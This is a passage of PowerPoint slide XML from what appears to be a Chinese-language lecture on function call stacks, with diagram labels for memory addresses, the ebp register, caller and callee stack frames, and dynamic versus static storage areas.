                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9720B0BE-F9E0-461E-9D34-D4660DC1EC74}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="3807125" y="3958506"/>
                  <a:ext cx="1365454" cy="163025"/>
                  <a:chOff x="6981571" y="1793809"/>
                  <a:chExt cx="1365454" cy="163025"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:cxnSp>
                <p:nvCxnSpPr>
                  <p:cNvPr id="361" name="Shape 640">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE3FC24-3D26-45AB-A60C-1595DA0347FC}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:cxnSpLocks/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="6981571" y="1943794"/>
                    <a:ext cx="690098" cy="0"/>
                  </a:xfrm>
                  <a:prstGeom prst="straightConnector1">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="9525" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:schemeClr val="dk2"/>
                    </a:solidFill>
                    <a:prstDash val="solid"/>
                    <a:round/>
                    <a:headEnd type="none" w="med" len="med"/>
                    <a:tailEnd type="triangle" w="med" len="med"/>
                  </a:ln>
                </p:spPr>
              </p:cxnSp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="362" name="Shape 636">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C46A4F5-AC58-4521-A7A5-DE1140B59AF4}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="7062390" y="1793809"/>
                    <a:ext cx="1284635" cy="163025"/>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000" dirty="0">
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>
                      </a:rPr>
                      <a:t>addr9</a:t>
                    </a:r>
                    <a:endParaRPr sz="1000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
                      <a:sym typeface="Consolas"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="360" name="Shape 636">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0DCF3BC-A160-4669-AEAF-C485F23709F1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3890116" y="3005092"/>
                  <a:ext cx="1277268" cy="36919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000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
                      <a:sym typeface="Consolas"/>
                    </a:rPr>
                    <a:t>addr13</a:t>
                  </a:r>
                  <a:endParaRPr sz="1000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="391" name="Shape 640">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{779EDEFA-AFF1-415E-A441-8225C602B142}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="392" idx="2"/>
              <a:endCxn id="385" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10302304" y="5463540"/>
              <a:ext cx="670565" cy="977682"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="392" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F440D0F5-4BDF-45D7-8D06-00A3796EE70D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10311148" y="5244715"/>
              <a:ext cx="1323442" cy="218825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="60000"/>
                <a:lumOff val="4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200" b="1" dirty="0"/>
                <a:t>ebp = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>addr15</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="393" name="Shape 640">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DD5C338-9801-4FA6-BF69-4DED9D2AF08C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="392" idx="2"/>
              <a:endCxn id="367" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10970718" y="5463540"/>
              <a:ext cx="2151" cy="874024"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="101600">
                <a:schemeClr val="accent4">
                  <a:satMod val="175000"/>
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
            </a:effectLst>
          </p:spPr>
        </p:cxnSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="427" name="组合 426">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CFD0291-4B71-43B6-8221-9E95055DD2EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7863935" y="6308608"/>
              <a:ext cx="1329556" cy="333200"/>
              <a:chOff x="6615347" y="310908"/>
              <a:chExt cx="1329556" cy="333200"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="428" name="Shape 636">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B6198E2-26BF-49F8-B290-56CD54FBCF6B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6674999" y="310908"/>
                <a:ext cx="1269904" cy="333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000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>addr10</a:t>
                </a:r>
                <a:endParaRPr sz="1000" dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="429" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E9C05EE-A907-4956-AFDB-B631A73B36F1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6615347" y="549695"/>
                <a:ext cx="674457" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="430" name="组合 429">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68DEE7F1-1104-417F-A364-BA9970142E05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7865630" y="5886992"/>
              <a:ext cx="1329555" cy="320914"/>
              <a:chOff x="6615347" y="323193"/>
              <a:chExt cx="1329555" cy="320914"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="431" name="Shape 636">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E426703-0AFD-45F2-BBFE-2B870AB66396}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6674998" y="323193"/>
                <a:ext cx="1269904" cy="320914"/>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000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>addr12</a:t>
                </a:r>
                <a:endParaRPr sz="1000" dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="432" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4D3E08C-3CE1-414D-98D6-0D657E235922}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6615347" y="549695"/>
                <a:ext cx="674457" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="433" name="组合 432">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D65EFB3-3927-4693-AF8C-2801788F6A75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7865897" y="5442896"/>
              <a:ext cx="1329554" cy="329743"/>
              <a:chOff x="6615347" y="314364"/>
              <a:chExt cx="1329554" cy="329743"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="434" name="Shape 636">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2C042E5-5FC3-4DEA-B76E-A9E47B0E13C0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6674996" y="314364"/>
                <a:ext cx="1269905" cy="329743"/>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000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>addr14</a:t>
                </a:r>
                <a:endParaRPr sz="1000" dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="435" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BFBB47B-0C01-4979-8BCE-BC40505F7B09}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6615347" y="549695"/>
                <a:ext cx="674457" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="252" name="文本框 251">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B39CFFAC-E1C5-4E43-8153-23828A69DCBD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10927291" y="5496495"/>
              <a:ext cx="329010" cy="547634"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>后转移</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="253" name="文本框 252">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD90FE5E-39CB-4EC1-A3E0-DEB4E4B769A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10311148" y="5735501"/>
              <a:ext cx="683224" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>先赋值</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="矩形 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEC66289-51AF-4BFE-9888-5949CB346B1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1247191"/>
            <a:ext cx="1088419" cy="419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动态存储区</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="矩形 255">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66111F2A-F3F8-49EF-A5C8-19E2660AAD02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="4043723"/>
            <a:ext cx="1088419" cy="419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动态存储区</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="矩形 258">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDD2A459-3FC4-49C0-81D0-20D42462C50F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5004113"/>
            <a:ext cx="1088419" cy="419469"/>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静态存储区</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Shape 623">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C0C8573-7114-4C17-99FF-D5678B291D7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="997475" y="4617103"/>
            <a:ext cx="292892" cy="1180747"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 50569"/>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1" name="Shape 623">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9583D4F-D955-492C-814E-0B8CB62BC449}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="998306" y="3883464"/>
            <a:ext cx="286505" cy="733642"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 50569"/>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2" name="Shape 623">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04A5ECA1-A048-419B-9756-3E6D69F20E3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="999236" y="973569"/>
            <a:ext cx="285575" cy="955204"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 50569"/>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nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA28199B-1D9D-4714-957C-59296AEF65DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5908392" y="1396544"/>
            <a:ext cx="2159173" cy="299515"/>
            <a:chOff x="5737452" y="1004284"/>
            <a:chExt cx="2533714" cy="305062"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79" name="矩形 78">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2691B8FD-8775-46A9-8A5E-4D49A72FABD4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5737452" y="1004284"/>
              <a:ext cx="1564497" cy="2821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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84DF8FBB-882C-442C-B74E-6044D47CA0FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5868570" y="1022055"/>
              <a:ext cx="1459214" cy="287291"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0070C0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>callee</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0070C0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>栈帧基地址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE0E465B-5C14-4437-84F7-DDF21EBB7101}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7295891" y="1008310"/>
              <a:ext cx="975275" cy="280916"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">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400" b="1" dirty="0"/>
                <a:t>Ebp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                </a:rPr>
                <a:t>(1WL)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Shape 623">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91647492-DFB5-43D3-A685-8B84BA7A0846}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5903594" y="1389821"/>
            <a:ext cx="184451" cy="954128"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 214312"/>
              <a:gd name="adj2" fmla="val 48793"/>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6" name="Shape 623">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B65038CE-A3B1-4FB4-B8B6-C991AB75B112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5909766" y="69619"/>
            <a:ext cx="197190" cy="1318387"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 69778"/>
              <a:gd name="adj2" fmla="val 39128"/>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7" name="文本框 266">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{326704D3-A39F-45E0-A5E3-7C9EEE393BE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6030784" y="751010"/>
            <a:ext cx="1172091" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stack frame</a:t>
            </a:r>
